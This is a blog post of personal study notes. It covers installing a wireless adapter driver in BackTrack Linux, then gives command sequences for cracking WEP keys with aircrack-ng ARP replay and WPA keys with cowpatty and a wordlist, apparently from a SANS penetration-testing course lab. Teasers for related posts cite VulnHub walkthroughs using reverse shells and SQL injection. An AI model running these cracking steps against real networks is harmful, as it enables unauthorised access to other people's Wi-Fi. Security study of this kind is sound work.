Skip to main content

cfg wlan in BT, wireless crack WEP & WAP using Aircrack-ng and CoWPatty

Configure Wirelesss Lan in Backtrack 5R1 (Ubuntu)

a. Download the utility (wireless lan card drivers) in a XP box. copy the  rtl8187B.sys & rtl8187B.inf files where these two files can be downloaded to the BT linux.

b. Open a Terminal (Applications, Accessories, Terminal) and type "sudo apt-get install ndisgtk" and press "Enter." Type "sudo apt-get install ndiswrapper-common" and "sudo apt-get install ndiswrapper-utils," both followed by "Enter." This installs Ndiswrapper, a utility for installing Windows devices drivers in Linux.
c. Plug in your TEW-424UB and insert the vendor CD into the disc drive and double-click the desktop icon to view its contents. Open the "Drivers" folder and navigate to "Windows XP." Drag the drivers (both SYS and INF) from this folder onto Ubuntu's desktop.

d. Type "sudo ndiswrapper -i /home/USERNAME/Desktop/Sis163u.INF," replacing USERNAME with your Ubuntu username, and press "Enter." Type "sudo modprobe ndiswrapper" and "sudo ndiswrapper -m," both followed by "Enter." This installs your TrendNet TEW-424UB wireless adapter.

e. iwlist wlan0 scan should give you results. get your essid and type:
sudo iwconfig wlan0 essid YourEssid
sudo dhclient3 wlan0 #to do dhcp else, use ifconfig wlan0.
you should be set.

f. use wicd network manager to enter the shared key


Read more: How do I install trendnet TEW-424 UB Wireless G USB Adapter - JustAnswer http://www.justanswer.com/computer/3anhb-install-trendnet-tew-424-ub-wireless-usb-adapter.html#ixzz1e7zxljhj

http://wn.com/Monitor_your_network_with_Backtrack_3
a) $airodump-ng w out c 1 bssid 00:00:00:00:00:00 wlan0
b) a client is conneted to the AP. we will be able to use the attack airreplay-ng -3 (ARP replay) to push the data and crack the WEP key
$aireplay-ng -3 -e linksys -a 00:00:00:00:00:00 -b 00:00:00:00:00 -h 00:00:00:00:00:00 -x 600 -r out.01.cap wlan0

c) $aircrack ng out 01.cap

--------------------
a. using.560.sans. cracking WEP

to cpature the traffic. first cmd put the interface in the monitor mode, listenig on chanel 6, then
capture the packets and store them in a pcap file
nn =  dont convert address to names or print domain name of host names
-i = interface followed by the interface name


-s  = snaplen. should limit snaplen to the smallest number that will capture the protocol information you're interested in.







-w = write to the file followed by the name of the file.







 





# iwconfig eth1 mode monitor channel 6
# tcpdump -nn -i eth1 -s0 -w [file.pcap]


# cp /home/tools/wep_crack.pcap /tmp
# /usr/sbin/tcpdump -nnr /tmp/wep_crack.pcap | grep "Beacon"
you should see the SSID in paraenthesis after the word Beacon

if you leave off the -e option, Aircrack-ng will let you chose which SSID traffic you wish to crack. if only one is present, Aircrack will proceed with the crack. you should see the key once aircrack is done.

# cd /home/tools/aircrack-ng-1.0-rc1
# ./aircrack-ng -e "560gc" /tmp/wep_crack.pcap

crack WPA
=========
go away 2 is this SSID

# cp /home/tools/wpa_crack.pcap /tmp
# wireshark -r /tmp/wpa_crack.pcap &
# cd /home/tools/cowpatty-4.2
# ./cowpatty -r /tmp/wpa_crack.pcap -s "go away 2" -f /home/tools/john-1.7.2/run/password.lst

Comments

Popular posts from this blog

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...

VM: pWnOS 2.0

Walkthru A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around ] b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [metasploit using PHP Blog exploit] c. http://netsec.ws/?p=430 [burpsuite, sql porxy] d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [sql injection, union. Very good explanation of the process of what is being done. Didnt try cmds] e. https://www.youtube.com/watch?v=ytzZfI27ueU [sql injection, sqlmap read file and upload reverse shell using sqlmap] f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [sql injection, union using burp Very good . It list all email field that we are passing and modifying thru burp suite/proxy/intercept. One could enter those union statements in the email field but in this case, the field truncates and remove the later part of union statment which is why we...

38 VM : d0not5top: 1.2

https://www.vulnhub.com/?q=D0Not5top&sort=date-des&type=vm Walkthru: A. https://github.com/Hamza-Megahed/CTFs/blob/master/d0not5top/README [  burp proxy, adding hostnames to /etc/host shows following but not working for me. Not showing localhost stuff, $ dirb http://172.16.34.163/control/ -X .txt,.php,.html     + http://172.16.34.163/control/hosts.txt     127.0.0.1 localhost     127.0.0.1 D0Not5top.ctf     #127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05] B. https://adaywithtape.blogspot.com/2017/04/vulnhub-d0not5top-writeup.html [use nc cmd to get the flag and echo cmd to decode the flag, wfuzz, virtualhost, partially binary string, google language translate, curl  -header  host request, additional domains, OWSAP ZAP, exiftool, HD, hash64,] wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ Changing the syntax just a tad to only show html 200...